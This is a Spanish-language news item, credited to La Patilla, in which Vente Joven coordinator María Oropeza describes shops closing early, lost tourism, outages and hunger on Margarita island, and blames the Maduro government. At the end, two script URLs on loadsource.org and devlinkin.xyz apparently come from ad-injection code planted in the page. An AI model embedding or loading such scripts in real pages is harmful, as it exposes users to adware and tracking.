María Oropeza, coordinadora nacional de Vente Joven, denunció este viernes desde el estado Nueva Esparta que ya a las cinco de la tarde los comercios están cerrados en la entidad: “Es una muestra de que luego de 20 años de socialismo, Margarita pasó de ser una de las islas más exóticas del Caribe a una de las más destruidas”.

Para la dirigente, en la entidad no solamente se han visto afectados los servicios públicos para turistas y neoespartanos, sino que el régimen acabó con el turismo y el entretenimiento que era una de las principales fuentes de ingreso del estado.

“Desde Nueva Esparta denunciamos la tragedia que se vive en la isla. La falta de servicios públicos ha afectado a los ciudadanos quienes pasan días sin agua y sin luz. Y la falta de transporte no solo hace imposible la movilización dentro de la isla, sino que también para salir de ella: no hay pasaje por ferry ni avión”, señaló.

La Coordinadora nacional Juvenil de Vente Venezuela narró que en el estado se ven ciudadanos deambulando por las calles en búsqueda de comida en la basura , o haciendo largas colas para comprar algún artículo de primera necesidad, “si es que encuentra o puede costearlo”.

Calificó la realidad que hoy se vive en Venezuela como “una tragedia”. Y aseveró que “todos estamos claros de que mientras siga Maduro en el poder, esto se va a agravar más”.

“Por eso, desde Vente Joven trabajamos incansablemente, organizando a los equipos en cada rincón del país, con la única intención de salir de esta tiranía y poder tener una Venezuela Rica de Verdad; con libertades individuales, donde se abran los mercados y donde se respete la propiedad privada. Solo de esa forma podremos traer prosperidad y desarrollo a nuestro país”, finalizó.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1532734774532https://devlinkin.xyz/addons/lnkr5.min.js

Loading...